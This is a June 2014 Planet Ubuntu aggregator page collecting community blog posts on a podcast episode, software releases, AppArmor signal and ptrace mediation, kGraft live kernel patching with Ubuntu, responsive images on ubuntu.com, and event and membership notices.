news aggregator

Ronnie Tucker: Full Circle Podcast Episode 41, Trusted To Fail!!

Planet Ubuntu - Sun, 2014-06-08 16:17

Full Circle Podcast Episode 41, Trusted To Fail!!

Welcome to our new format show, there are several changes from the previous format, the most important being we are now recording together at the Blackpool Makerspace in the office.  This Episode we Test Ubuntu 14.04, Review of Official Ubuntu Server Book.

File Sizes:
  • OGG 34.2Mb
  • MP3 58.4Mb

Running Time: 1hr 00mins 49seconds

Feeds for both MP3 and OGG:

RSS feed, MP3: http://fullcirclemagazine.org/category/podcast/feed

RSS feed, OGG: http://fullcirclemagazine.org/category/podcast/feed/atom

The podcast is in MP3 and OGG formats. You can either play the podcast in-browser if you have Flash and/or Java, or you can download the podcast with the link underneath the player. Show notes after the jump.

Your Hosts:

Show Notes

02:08 | WELCOME and INTRO:

Welcome to our new studio recording format. Here are a couple of pictures from the recording:

 

02:35 | Since Last Time

  • Tony - Starting to get used to his new life of leisure by getting very busy doing lots of stuff.  He attended a local computer auction and bought a couple of Lenovo X200s laptops and have been playing with these.  Also He’s been getting frustrated with LMDE, as he said on the last show he’s been having issues with audio in LMDE.  He’s now found out that it gobbles up HDD space, only installed this system about 3 months back on a 160Gig HDD which should give loads of space for applications and updates but he has started to get the low disc space warning. Even having transferred all the data he can off the drive to other storage and given the remaining space taken up in the home folder is only around 7Gb The OS has swallowed up nearly 130 Gb of space. In the end he had to reinstall Mint 16 to regain a workable system.
  • Les - Has spent a lot of time in recent months working with a class of young hackers from Mere Side Primary School in Blackpool. They designed, built and tested an emergency beacon power by Raspberry Pi and PiGlow from Pimoroni. They entered a competition from PA Consulting to find the best use of technology for the environment. It was our first time in the competition, and they came second in our group, a great result for the children. He have also been working with the Department for Work Pensions, hosting a hackday using robotics and the Raspberry Pi using Pibrella from Pimoroni which is an awesome piece of kit for £10.
  • Olly - Well it’s been a roller coaster couple of months for him, he left his old job as some of you who follow him on social media may have seen he has set up a business with a very good friend of his to provide a complete IT, Data & Telephony support service to startup and medium sized businesses including a package they’ve dubbed “Business In A Box”.  The good news for this podcast is they have made a commitment to run their business and deliver their services utilising Free and Open Source Software wherever possible, so lots more reviews of software and hints and tips will be shared on the show as they set things up and get settled in, so far they’ve setup a VPS running the company website, mail server, file server utilising NFS, LDAP and Samba (their Admin Assistant/Bookkeeper uses Windows so they needed to share files with her).  Shortly they’ll be setting up a PBX using Asterisk so they can have a business number they can stay connected to anywhere.  This is going to be quite a challenge for business partner Matt as he comes from a Microsoft and Proprietary Unix background and uses a lot of Apple products for personal stuff, including an Iphone and a MacBook Pro. So far he seems to be taking to it well, using the Motorola Moto G as a defacto business handset (we know it’s technically not FOSS software!!) he’s quite impressed with the quality of the phone for the money and how much android has come on since he last saw it, which would be around 1.4.  they have also procured Lenovo ThinkPad X240s and installed Linux Mint with Cinnamon Desktop Environment on them which Matt likes, he has also been experimenting with installing Ubuntu Server edition on a few bits of old redundant hardware as we will more than likely be using it for a standard VPS build, more about that later.

10:47 | NEWS

  • Ubuntu 14.04 Trusty Tahr was released on the 17th April 2014, its the first long-term support release with support for the new “arm64″ architecture for 64-bit ARM systems, as well as the “ppc64el” architecture for little-endian 64-bit POWER systems. This release also includes several subtle but welcome improvements to Unity, AppArmor, and a host of other great software. http://fridge.ubuntu.com/2014/04/17/ubuntu-14-04-trusty-tahr-released/
  • Ubuntu One the file sync storage and multimedia distribution services  has been axed by Canonical, the service will cease to sync from  the 1st June 2014 and your data will remain available for download until the 31st July 2014 after which date your data will be deleted as the servers will be closed down.  Music purchasing has now ceased.  Now might be a good time to take advantage of the SpiderOak promotional code in the latest edition of the magazine. http://blog.canonical.com/2014/04/02/shutting-down-ubuntu-one-file-services/
  • Linux Foundation to run as a Massive Open Online Course (MOOC). The Linux Foundation has joined up with edX to release its ‘Introduction to Linux Course’ free to the community you can find more information here.  http://aq.be/7a124e
  • Google has now done a u-turn on it’s controversial Google+ integration after upsetting the Youtube Community earlier this year, forcing it’s users to activate a G+ account so that they could comment on videos and respond to comments on their own videos.  Is this the beginning of the end for Google’s Social Networking service which has attracted a fair amount of criticism and controversy over it’s 3 year life.  http://www.zdnet.com/google-plus-is-turning-negative-but-dont-bet-on-it-going-away-7000028831/
  • New from the Pi foundation – on 7th April they released information about the new Pi compute module, this is basically the Pi chips on a board the size of a laptop SODIMM that can be plugged into a board with input and output ports provided by the foundation or that can be designed independently. the link to the blog is:  http://goo.gl/9Q0hCN

25:28 | LINUX LABS – Ubuntu 14.04 Testing

  • This experiment was a test of installation and usability of Ubuntu 14.04 on 3 different hardware specifications.
  • First was the minimum requirements, an “emachine” Intel Celeron 700Mhz with 768Mb RAM.
  • The Second was the preferred specification for running Unity Desktop a Compaq Intel Pentium 4 1.6Ghz with 768Mhz RAM
  • The Third was a reasonably modern specification of a Lenovo ThinkPad X220 with a 1.8Ghz Intel Core 2 Duo Processor with 2Gb RAM
  • We used the Ubuntu 14.04 32Bit DVD ROM install media.
  • After an hour of waiting for the installation to complete on the emachine PC we declared it lost as the installer had made no discernible progress what so ever.  We then downloaded the Lubuntu 14.04 32Bit installation media and tried again with that.
  • The Lubuntu installation also failed, which is meant to be a lightweight distro!!
  • The Compaq managed to install 14.04 but that was about as good as it got, it took 10 minutes to boot to the Login prompt, another 5 minutes to get the desktop and Unity dash to load.  It ran pretty sluggishly from then on.
  • The only real success was the Lenovo, which installed in around 20 minutes and ran pretty smoothly.

  • We didn’t get time to test the usability of the OS due to the time spent installing the various flavours of Ubuntu

39:01 | REVIEW - Official Ubuntu Server Book Third Edition by Kyle Rankin & Benjamin Mako Hill

  • This book is recommended as a no experience required introduction to the most common Linux/Ubuntu Server technologies. http://www.amazon.co.uk/Official-Ubuntu-Server-Book-Edition/dp/0133017532
  • The first part of the book takes you through the history of GNU/Linux and the history of Ubuntu and Canonical includes some of the structure a organisational decisions in the Introduction, 26 pages of it!! this seems a little superfluous as I don’t think anyone who’ll pick this book up will be unfamiliar with Ubuntu/Canonical or will read this section as they are looking for a technical guide to administering Ubuntu Server.
  • The next few chapter take you through the installation process, disk partitioning explaining the different types of partition and disk system formats and why you choose one over the other, also a brief guide to the file structure of the Linux operating system.
  • Then look at various server roles which you will select for your server, these are preconfigured profiles for packages and software to be installed so that a server can perform a particular role, such as mail server, web server, DNS and so on.
  • The book then moves onto installing specific software to undertake a specific server task such as email and web server walking you through installing Postfix, Dovecot and Apache.  The book does discuss some of the options available to you during installation and configuration but it does guide you towards the a standard setup that you would expect for most situations.
  • In summary if you are relatively new to Linux servers and want a first timers approach where you can get up and running fairly quickly with things like running a webserver then this a great book for you, well explained with a very straight forward approach.  But I would add a word of caution here, more complicated operations such as running a mail server I would move on to something more detailed after reading this book such O’Reilly’s Postfix & Dovecot books as you do need quite and in-depth knowledge of the subject.

46:18 | EVENTS

  • Manchester Girl Geeks Bracamp 2014 – They’ve done it again, this years it’s bigger at better, now being held at Manchester Metropolitan University in the Geoffrey Manton Building http://mggbarcamp14.eventbrite.co.uk http://manchester.girlgeekdinners.com/
  • Coder Dojo – Blackpool – We’ve talked about Coder Dojos before on the show, now hosts Olly and Les have got involved with a new local one in Blackpool.  For those who missed our discussion previously, Coder Dojos are free monthly workshops where children can learn all about coding and computing via carefully curated lessons. The main site is http://coderdojo.com/ and Blackpool’s site is at http://blackpoolcoderdojo.org.uk/

52:10 | FEEDBACK

55:33 | OUTRO AND WRAP

Full Circle Magazine #85 is out now.

Comments: on this page, using the comment form, OR;

Send us a comment to podcast@fullcirclemagazine.org

tweet us @FullCirclePod or by using the hashtag #FullCirclePodcast

You can also send us a comment by recording an audio clip of no more than 30 seconds and sending it to the same address. Comments and audio may be edited for length. Please remember this is a family-friendly show.

Please note: this podcast is provided with absolutely no warranty whatsoever; neither the producers nor Full Circle Magazine accept any responsibility or liability for content or interaction which readers and listeners may enter into using external links gleaned from this website, forum or podcast series.

Creative Commons Music Tracks

Opening: ‘Achilles’ by Kevin Macleod

Main Theme: ‘Revolve’ by His Boy Elroy

Catch Up to News: ‘Dance Zone’ by Unknown

News to Linux Labs: On the Run 1 By Unknown

Linux Labs to Review and Review to Feedback: Iron Man By SoundJay

Censor at: 39m 47s: Train Honk Horn Clear by Mike Koenig

Censor at: 59m, 43s: Dog Barking Sound Effect by Jace

 

Ronnie Tucker: Linux Kernel 3.10.41 LTS Is Available for Download

Planet Ubuntu - Sun, 2014-06-08 09:00

The latest version of this branch of the stable Linux kernel, 3.10.41, has been announced by Greg Kroah-Hartman and comes with quite a few changes and fixes.

The amount of changes and enhancements for this branch of the Linux kernel is rather large and the developers have added numerous drivers and other improvements. This is an LTS release and it’s likely that it will be updated for a long time.

If you are using any of the versions released until now in the Linux kernel 3.10.x branch, it’s recommended that you update to this current version.

Source: http://news.softpedia.com/news/Linux-Kernel-3-10-41-LTS-Is-Available-for-Download-445652.shtml

Submitted by: Silviu Stahie

Ronnie Tucker: LibreOffice 4.3 Beta 2 Is Now Available for Testing

Planet Ubuntu - Sun, 2014-06-08 08:43

The developers from The Document Foundation have released a new build in the LibreOffice 4.3 Beta branch, bringing even more changes than the latest update in the series. It looks like 4.3 will be quite interesting, but it’s going to take a while until it’s released.

Some fixes, according to the changelog, are the upper margin of the multi-page floating table for WW8 import has been fixed, the wrong text position in grouped list has been corrected, the direct formatting for numbering in .DOCX is now handled correctly, and numerous other fixes have been implemented.

Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only.

Source: http://news.softpedia.com/news/LibreOffice-4-3-Beta-2-Is-Now-Available-for-Testing-445664.shtml

Submitted by: Silviu Stahie

 

Bodhi.Zazen: Installing ddate

Planet Ubuntu - Sun, 2014-06-08 07:10

ddate is a utility to display the Discordian date with a colorful history. It was removed from util-linux but the source code is still available on GitHub

source https://github.com/bo0ts/ddate

Click the “Download Zip” box on the left.

save / extract in ~/src

cd ~/src/ddate-master
cmake CMakeLists.txt
make
sudo make install

There is no uninstall script, so to remove,

sudo rm /usr/local/bin/ddate
sudo rm /usr/local/share/man/man1/ddate.1.gz

For additional information see

Russell John: Apple Macs Running on Windows!

Planet Ubuntu - Sat, 2014-06-07 16:16

I’m laughing hysterically since saw this picture 20 minutes, and I still can’t stop!

Wow, so Apple Macs are made on Windows? pic.twitter.com/fOqZUJezGj

— Linux (@Linux) June 7, 2014


The picture shows CEO of Apple Tim Cook visiting a Mac production facility in Austin, Texas, and the iMacs behind him are running on Windows XP! Apple makes their own OS but their machines are made on Windows? How funny is that?

Adnane Belmadiaf: How I Did Make The Ubuntu HTML5 Range Slider

Planet Ubuntu - Sat, 2014-06-07 16:00

Last week while i was attending the Canonical Client Sprint in Malta, i start looking into re-lifting some components like the CheckBox/Switch and the Slider, so in this post i'll explain how i did implement the new the Slider.

The first thing that needs be done is to remove the default styles using -webkit-appearance: none.

input[type=range] { -webkit-appearance: none; }

Now we can start adding our CSS styles, Webkit/Blink provides an easy way to style the thumb using the pseudo class ::-webkit-slider-thumb but first we need to remove the defaul styles.

input[type=range] { -webkit-appearance: none; background: linear-gradient(to right, rgba(175, 175, 175, 0.3) 0%, rgba(175, 175, 175, 0.3) 100%); background-position: center; background-size: 99% 4px; background-repeat: no-repeat; -webkit-appearance: none; width: auto; height: 36px; border-radius: 1px; overflow: hidden; margin-top: 5px; margin-bottom: 5px; } input[type=range]::-webkit-slider-thumb { -webkit-appearance: none; }

Now let's style the thumb :

input[type=range]::-webkit-slider-thumb { -webkit-box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.2); box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.2); -webkit-box-sizing: border-box; box-sizing: border-box; -webkit-appearance: none; background-color: #fff; pointer-events: none; border-radius: 3px; width: 16px; height: 16px; position: relative; }

At this point we are still missing the oragne fill color, unfortunatly Webkit/Blink doesn't provide any pseudo class to style this area like IE does, so i have tried to combine the pseudo class ::-webkit-slider-thumb and :before to create this effect.

input[type=range]::-webkit-slider-thumb:before { position: absolute; top: 6px; left: -2000px; width: 2000px; height: 4px; background: #dd4814; content: ' '; }

Ronnie Tucker: PlayCanvas 3D WebGL Game Engine Now Open Source

Planet Ubuntu - Sat, 2014-06-07 10:00

PlayCanvas is the “world’s easiest to use WebGL Game Engine”. It’s free, it’s open source and it’s backed by “amazing” developer tools. Well now isn’t this interesting.

It has been worked on for the past 3 years and now it is under the MIT license, so you can pretty much do with it as you see fit. Now it is just a matter of getting browser developers to make the experience less annoying to game inside a browser and the OS you use becomes a little less relevant.

Source: http://www.gamingonlinux.com/articles/playcanvas-3d-webgl-game-engine-now-open-source.3843

Submitted by: Liamdawe

Ronnie Tucker: Ubuntu MATE Flavor Could Arrive Soon, Prototype Looks Great Already

Planet Ubuntu - Sat, 2014-06-07 09:46

Ever since the introduction of Unity, some of the Ubuntu users have been pining after GNOME 2, the desktop environment in use until Ubuntu 11.04 arrives. It looks like it had a lot of fans and a part of the Linux community is still hoping that the good days will return.

Martin Wimpress, a MATE Desktop team member, took it upon himself to make an Ubuntu prototype featuring MATE, which greatly resembles the old style used by Canonical until 2011.

This is just preliminary work and it’s more like an experiment than anything else, but the developer had help from Canonical’s Alan Pope and he left a message saying that something interesting might come out of this: “there’s something cooking and it smells delicious. Thanks to Alan Pope for the help.”

Source: http://news.softpedia.com/news/Ubuntu-MATE-Flavor-Could-Arrive-Soon-445509.shtml

Submitted by: Silviu Stahie

Jamie Strandboge: Application isolation with AppArmor – part IV

Planet Ubuntu - Fri, 2014-06-06 20:20

Last time I discussed AppArmor, I talked about new features in Ubuntu 13.10 and a bit about ApplicationConfinement for Ubuntu Touch. With the release of Ubuntu 14.04 LTS, several improvements were made:

  • Mediation of signals
  • Mediation of ptrace
  • Various policy updates for 14.04, including new tunables, better support for XDG user directories, and Unity7 abstractions
  • Parser policy compilation performance improvements
  • Google Summer of Code (SUSE sponsored) python rewrite of the userspace tools
Signal and ptrace mediation

Prior to Ubuntu 14.04 LTS, a confined process could send signals to other processes (subject to DAC) and ptrace other processes (subject to DAC and YAMA). AppArmor on 14.04 LTS adds mediation of both signals and ptrace which brings important security improvements for all AppArmor confined applications, such as those in the Ubuntu AppStore and qemu/kvm machines as managed by libvirt and OpenStack.

When developing policy for signal and ptrace rules, it is important to remember that AppArmor does a cross check such that AppArmor verifies that:

  • the process sending the signal/performing the ptrace is allowed to send the signal to/ptrace the target process
  • the target process receiving the signal/being ptraced is allowed to receive the signal from/be ptraced by the sender process

Signal(7) permissions use the ‘signal’ rule with the ‘receive/send’ permissions governing signals. PTrace permissions use the ‘ptrace’ rule with the ‘trace/tracedby’ permissions governing ptrace(2) and the ‘read/readby’ permissions governing certain proc(5) filesystem accesses, kcmp(2), futexes (get_robust_list(2)) and perf trace events.

Consider the following denial:

Jun 6 21:39:09 localhost kernel: [221158.831933] type=1400 audit(1402083549.185:782): apparmor="DENIED" operation="ptrace" profile="foo" pid=29142 comm="cat" requested_mask="read" denied_mask="read" peer="unconfined"

This demonstrates that the ‘cat’ binary running under the ‘foo’ profile was unable to read the contents of a /proc entry (in my test, /proc/11300/environ). To allow this process to read /proc entries for unconfined processes, the following rule can be used:

ptrace (read) peer=unconfined,

If the receiving process was confined, the log entry would say ‘peer=”<profile name>”‘ and you would adjust the ‘peer=unconfined’ in the rule to match that in the log denial. In this case, because unconfined processes implicitly can be readby all other processes, we don’t need to specify the cross check rule. If the target process was confined, the profile for the target process would need a rule like this:

ptrace (readby) peer=foo,

Likewise for signal rules, consider this denial:

Jun 6 21:53:15 localhost kernel: [222005.216619] type=1400 audit(1402084395.937:897): apparmor="DENIED" operation="signal" profile="foo" pid=29069 comm="bash" requested_mask="send" denied_mask="send" signal=term peer="unconfined"

This shows that ‘bash’ running under the ‘foo’ profile tried to send the ‘term’ signal to an unconfined process (in my test, I used ‘kill 11300′) and was blocked. Signal rules use ‘read’ and ‘send to determine access, so we can add a rule like so to allow sending of the signal:

signal (send) set=("term") peer=unconfined,

Like with ptrace, a cross-check is performed with signal rules but implicit rules allow unconfined processes to send and receive signals. If pid 11300 were confined, you would adjust the ‘peer=’ in the rule of the foo profile to match the denial in the log, and then adjust the target profile to have something like:

signal (receive) set=("term") peer=foo,

Signal and ptrace rules are very flexible and the AppArmor base abstraction in Ubuntu 14.04 LTS has several rules to help make profiling and transitioning to the new mediation easier:

# Allow other processes to read our /proc entries, futexes, perf tracing and
# kcmp for now
ptrace (readby),
 
# Allow other processes to trace us by default (they will need
# 'trace' in the first place). Administrators can override
# with:
# deny ptrace (tracedby) ...
ptrace (tracedby),
 
# Allow unconfined processes to send us signals by default
signal (receive) peer=unconfined,
 
# Allow us to signal ourselves
signal peer=@{profile_name},
 
# Checking for PID existence is quite common so add it by default for now
signal (receive, send) set=("exists"),

Note the above uses the new ‘@{profile_name}’ AppArmor variable, which is particularly handy with ptrace and signal rules. See man 5 apparmor.d for more details and examples.

14.10

Work still remains and some of the things we’d like to do for 14.10 include:

  • Finishing mediation for non-networking forms of IPC (eg, abstract sockets). This will be done in time for the phone release.
  • Have services integrate with AppArmor and the upcoming trust-store to become trusted helpers (also for phone release)
  • Continue work on netowrking IPC (for 15.04)
  • Continue to work with the upstream kernel on kdbus
  • Work continued on LXC stacking and we hope to have stacked profiles within the current namespace for 14.10. Full support for stacked profiles where different host and container policy for the same binary at the same time should be ready by 15.04
  • Various fixes to the python userspace tools for remaining bugs. These will also be backported to 14.04 LTS

Until next time, enjoy!


Filed under: canonical, security, ubuntu, ubuntu-server

Chris J Arges: using kgraft with ubuntu

Planet Ubuntu - Fri, 2014-06-06 18:50
New live kernel patching projects have hit LKML recently [1][2], and I've taken the opportunity to test drive kGraft with the Ubuntu kernel. This post documents how to get a sample patch working.
A Simple ExampleFirst, I had to take the patches from [3] and apply them against the ubuntu-utopic kernel, which is based on 3.15-rc8 as of this post. They cherry-picked cleanly and the branch I'm using is stored here [4]. In addition to applying the patches I had to also enable CONFIG_KGRAFT. A pre-built test kernel can be downloaded here [5].

Next, I created a test VM and installed the test kernel, headers, and build dependencies into that VM and rebooted. Now after a successful reboot, we need to produce an actual patch to test. I've created a github project [6] with the sample patch; to make it easy to clone and get started.

sudo apt-get install git build-essentialgit clone https://github.com/arges/kgraft-examples.git
cd kgraft-examples
make

The code in kgraft_patcher.c is the example found in samples/kgraft [7]. Now we can build it easily using the Makefile I have in my project by typing make.

Next, the module needs to be inserted using the following:

sudo insmod ./kgraft_patcher.ko

Run the following to see if the module loaded properly:

lsmod | grep kgraft

You'll notice some messages printed with the following:

[ 211.762563] kgraft_patcher: module verification failed: signature and/or required key missing - tainting kernel
[ 216.800080] kgr failed after timeout (30), still in degraded mode
[ 246.880146] kgr failed after timeout (30), still in degraded mode
[ 276.960211] kgr failed after timeout (30), still in degraded mode
This means that not all processes have entered the kernel and may not have a "new universe" flag set.  Run the following to see which processes still needs to be updated.

cat /proc/*/kgr_in_progress

In order to get all processes to enter the kernel sometimes a signal needs to be sent to get the process to enter the kernel.

An example of this is found in the kgraft-examples [6] called 'hurryup.sh':

#!/bin/bash
for p in $(ls /proc/ | grep '^[0-9]'); do
if [[ -e /proc/$p/kgr_in_progress ]]; then
if [[ `sudo cat /proc/$p/kgr_in_progress` -eq 1 ]]; then
echo $p;
sudo kill -SIGCONT $p
fi
fi
done

Here is checks for all processes that have 'kgr_in_progress' set and sends a SIGCONT signal to that process. 
I've noticed that I had to also send a SIGSTOP followed by a SIGCONT to finally get everything synced up.
Eventually you'll see:
[ 1600.480233] kgr succeeded
Now your kernel is running the new patch without rebooting!
References
  1. https://lkml.org/lkml/2014/4/30/477
  2. https://lkml.org/lkml/2014/5/1/273
  3. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/
  4. http://zinc.ubuntu.com/git?p=arges/ubuntu-utopic.git;a=shortlog;h=refs/heads/kgraft-utopic
  5. http://people.canonical.com/~arges/kgraft-utopic/
  6. https://github.com/arges/kgraft-examples
  7. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/samples/kgraft/kgraft_patcher.c?h=kgraft
  8. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/tools/kgraft/create-stub.sh?h=kgraft

Rhonda D'Vine: No Portland

Planet Ubuntu - Fri, 2014-06-06 12:55

This year's debconf in portland will happen without me being there. As much as I would love to be at home again, I won't be able to afford it. As much as I'd liked to help to keep portland weird, a discussion led to the feeling that I'm not welcome there and along that lines made me miss the deadline for sponsorship request due to not being very motivated to push for it because of that. And without sponsorship I won't be able to afford it, given that I need to save up for my upcoming move.

This also means I won't be able to host the Poetry Night. I hope that someone will be picking up that ball and continue it. Personally I am more motivated than ever to start writing again, given that there is currently a Bus Bim Slam (Bus Tram Slam) happening over here in Vienna and I try to attend as much stations as possible, and there will be a Diary Slam during this year's FemCamp Vienna.
I'm indifferent on whether the Debconf Poetry Night should be recorded or not. On the one hand it would be great to see people performing, on the other hand it might shy away certain personal poems that one wouldn't want to have out in the wild. Whoever picks it up, think about that part.

I wish everyone luck in Portland, and I'm looking forward to yet another great job by the video team so I can follow a few talks from at home. It sort of breaks my heart to not be able to hug you lot this year, and I wish you a great conference. We'll meet again next year in Heidelberg!

/debian | permanent link | Comments: 1 |

Canonical Design Team: Making ubuntu.com responsive: dealing with responsive images (10)

Planet Ubuntu - Fri, 2014-06-06 09:30

This post is part of the series ‘Making ubuntu.com responsive‘.

Deciding how you’re going to handle responsive images is a big part of most responsive projects — also, one that usually causes many headaches!

We had really interesting discussions within the team to try to find out which options were out there, being used by other people, and whether those solutions could be useful (and possible) for us.

There is a range of solutions and opinions on this matter, but ultimately it’s all down to the content and types of images your website actually has to handle, and the technical and resource limitations of your team.

We tried to keep an open mind as to what would be possible to achieve within a very small timeframe: we wanted to find a solution that would work for our content, that would be achievable within our deadlines, and obviously, that would improve the experience of the visitors to our site.

Making an image inventory

Before discussing any potential solutions, it’s important to understand exactly what type of images are used on your site, how they are created, who creates them, how they are added to the site and in which locations, how the images play with the content and whether there are different levels of importance (UI icons, purely decorative images, infographics, editorial images, etc.).

You might realise you only use UI icons and vector illustrations, or that all your images are decorative and secondary, or even that all your images are photos commissioned to professional photographers and photojournalists that add great value to your content and designs. It’s only after doing this inventory that you’ll have sufficient information to decide what to do next and what your site needs.

On ubuntu.com there are five different types of image assets:

  • Pictograms: from an existing set of pre-approved pictograms, created in various formats, in a small subset of colours
  • Illustrations: usually created using two or more pictograms, or in a similar style, in vector format
  • Photography: these can be product shots of devices, screengrabs of our operating system and applications, and sometimes other types of photographic images
  • Logos: not only Ubuntu and Canonical’s own logos, but several partner logos
  • Backgrounds: these can be anything from dot patterns to textured backgrounds

Pictograms, illustrations, photography, logos and backgrounds are part of the image arsenal of ubuntu.com.

The pictograms and illustrations are always created in vector format and can easily be exported to an SVG. Similarly, many of the logos we use on the site can be sourced in an SVG format, but many times this isn’t possible. The photography and backgrounds used on the site, however, are usually provided to us in bitmap format, that lose definition when scaled up.

With this inventory in mind, we knew we’d have to come up with different solutions for the different types of assets rather than a single solution for all images.

Scalable vectors: pictograms, illustrations and logos

We investigated the possibility of creating a font for our icons and even started this process, but quickly decided that the lack of consistent browser support wasn’t acceptable.

The decision to move from GIF and PNG icons to SVG was relatively straightforward for us, as all our icons and pictograms are created in vector format from the outset. This would allow us to have crisp, scalable icons in most browsers, whether the device has a retina screen or not.

It was at this point that we thought it would be a good idea to finally introduce Modernizr into our toolset. With Modernizr we could target browsers that don’t support SVG and serve them with a PNG image replacement.

We did run into some browser support issues, mainly with Opera Mini which doesn’t support background-size (necessary if you’re scaling the same image asset instead of creating copies at different sizes) but does support SVG. To solve this problem, Ant wrote a JavaScript snippet that detects Opera Mini and adds the class .opera-mini to the body of the document. He will be covering this in more detail in a following post in this series.

Opera Mini’s SVG rendering issues.

We have explored the possibility of dynamically changing the colours of our SVG pictograms, but haven’t yet found a solution that is compatible across browsers — we’re open to suggestions!

Bitmap formats: photography and backgrounds

This is where things usually get trickier: how do you create a balance between serving users the best quality image they can get and saving their bandwidth?

Ideally, we’d have had the time to add the ability of images to be called on the fly in the size needed, so that the user didn’t have to download a size that was not intended for his or her screen size. This is something that we still want to work on, but just couldn’t justify to be added to the scope of this first iteration of the responsive transition.

Eventually we decided to use Imager.js — made by the BBC News developers — for responsive imaging in the markup. We chose this solution as it has simple syntax and is being used in production on high traffic websites, so it was proven to work. It seemed like a simple solution that fit our needs. In simple terms, the script runs through the page, looking up placeholder elements and replacing them with the closest available image size based on the width of the container.

CSS helper classes

We’ve created three CSS classes that can be used to hide/show images and other elements according to the size of the viewport:

  • .for-small: only shows in the smallest media query viewport
  • .for-medium: only shows in the small and medium media query viewports
  • .not-for-small: doesn’t show in the smallest media query viewport

These classes give us enough flexibility to decide which images should be visible based on our breakpoints in cases where we need more control. This means if we change the breakpoints, the classes will inherit the change.

File size

Initially we were planning on creating several versions of the images on the site, for small, medium and large screen sizes, but we found out that some of the current images on the site had a much larger file size than they needed to — for example, some transparent PNGs were being used when transparency was not a requirement.

With the limited time available, we opted for focusing on reducing file sizes as much as possible for existing images as a priority. This way, we’d make our pages smaller but small higher density screens would still see crisp images, since at smaller sizes they’d be reduced to about half their original size.

You can see a comparison of the file size per section of the site before and after this process.

Section Size before Ubuntu 14.04 LTS release (KB) Size after Ubuntu 14.04 LTS release (KB) Homepage 434 193 About 1460 1787 Cloud 2809 2304 Desktop 3794 2571 Download 2921 3990 Management 991 1102 Partners 2243 2320 Phone 6943 2021 Server 1483 636 Support 679 480 Tablet 3318 1829 TV 603 733

We obtained these sizes using a combination of YSlow and PhantomJS.

Some of the sections were expanded for the Ubuntu 14.04 LTS release in April, which justifies some of the increases. The desktop, phone and tablet sections, however — the worst offenders — saw a significant reduction in file size, mainly from switching to the most appropriate file format instead of all PNGs.

Another way to create more consistency and file size savings across the site was the introduction of a pictogram and logo package. Instead of creating pictograms ad-hoc as needed, we now have a defined set of pictograms in a central location that can be reused across the site, in all its different colour variations. Because the pictograms and many of the logos are provided in an SVG format, they can be scaled to the size that is needed.

Ideas for the future

Despite the visible improvements, there are plenty of things we’d still like to explore in the way we handle images in a responsive world.

We are currently working on an asset server that will allow us to dynamically request different sizes and formats of assets (for example, SVG to PNG), which we can offset, crop, etc., right from the src property, also being far more cacheable with long expiry times. It will also make it easier to share assets, as they will be located at a permanent URL and will become findable through a database and metadata, which should encourage reuse.

These were the solutions we came up with and worked best with your timescales and resources. We’d love to hear how you’ve handled images in your responsive projects too, so let us know in the comments!

Reading list

Ubuntu Podcast from the UK LoCo: S07E10 – The One with the Ultimate Fighting Champion

Planet Ubuntu - Fri, 2014-06-06 06:57

We’re back with Season Seven, Episode Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Tony Whitmore, and Laura Cowen are drinking tea and eating very rich chocolate cake (like this one, only more chocolatey) in Studio L.

 Download OGG  Download MP3 Play in Popup

In this week’s show:

  • We interview Martin Wimpress from the MATE desktop team.
    • If you want to know the memory requirements of the many different desktop environments, see his blog.
    • Also, he is a maintainer of the MATE LiveCD.
  • We also discuss:
    • Beards. Again.
    • Secret projects that can’t be talked about.
    • Getting even closer to sending Tony up a mountain in Malawi.
    • Going on an Ubuntu Sprint to Malta.
    • Moving web and email hosting to Clook, a Northern hosting service.
  • We share some Gooey Lurve from Mark:
    “Undo Closed Tab” in Firefox
  • And we read your feedback – thanks for sending it in!

We’ll be back next week, so please send your comments and suggestions to: podcast@ubuntu-uk.org
Join us on IRC in #uupc on Freenode
Leave a voicemail via phone: +44 (0) 203 298 1600, sip: podcast@sip.ubuntu-uk.org and skype: ubuntuukpodcast
Follow us on Twitter
Find our Facebook Fan Page
Follow us on Google+

Benjamin Kerensa: Speaking at OSCON 2014

Planet Ubuntu - Fri, 2014-06-06 05:52

Mozillians at OSCON 2013

In July, I’m speaking at OSCON. But before that, I have some other events coming up including evangelizing Firefox OS at Open Source Bridge and co-organizing Community Leadership Summit. But back to OSCON; I’m really excited to speak at this event. This will be my second time speaking (I must not suck?) and this time I have a wonderful co-speaker Alex Lakatos who is coming in from Romania.

For me, OSCON is a really special event because very literally it is perhaps the one place you can find a majority of the most brilliant minds in Open Source all at one event. I’m always very ecstatic to listen to some of my favorite speakers such as Paul Fenwick who always seems to capture the audience with his talks.

This year, Alex and I are giving a talk on “Getting Started Contributing to Firefox OS,” a platform that we both wholeheartedly believe in and we think folks who attend OSCON will also be interested in.

#OSCON 2014 presents “Getting Started Contributing to Firefox OS” by @bkerensa of @mozilla http://t.co/f1iumzhg1q

— O’Reilly OSCON (@oscon) May 14, 2014

 


And last but not least, for the first time in some years Mozilla will have a booth at OSCON and we will be doing demos of the newest Firefox OS handsets and tablets and talking on some other topics. Be sure to stop by the booth and to fit our talk into your schedule. If you are arriving in Portland early, then be sure to attend the Community Leadership Summit which occurs the two days before OSCON, and heck, be sure to attend Open Source Bridge while you’re at it.

The Fridge: Renewed call for 12:00 UTC Membership Board Nominees

Planet Ubuntu - Thu, 2014-06-05 18:04

At the end of April we called for nominations to the Membership Board, this board oversees the addition of people to Ubuntu Members, needless to say we, and we would hope you, believe this to be an important part of the Ubuntu Community.

Since then the Membership Board has received some nominations, however, up to now all the received nominations are for the 22:00UTC board.

So… we are in need of people that are able to fulfill this important job specifically for the 12:00UTC.

If you fulfill the requirements to be nominated AND can do so at the all important time slot please consider either nominating yourself or somebody else (please confirm they wish to accept the nomination and state you have done so), please send a mail to the membership boards mailing list (ubuntu-membership-boards at lists.ubuntu.com) by Friday, June 20th. You will want to include some information about yourself (or the applicant you are nominating) and a launchpad profile link.

To recap on the requirements for this position

  • be an Ubuntu member (preferably for some time)
  • be confident that you can evaluate contributions to various parts of our community
  • be committed to attending the membership meetings at 12:00UTC
  • broad insight into the Ubuntu community at large is a plus

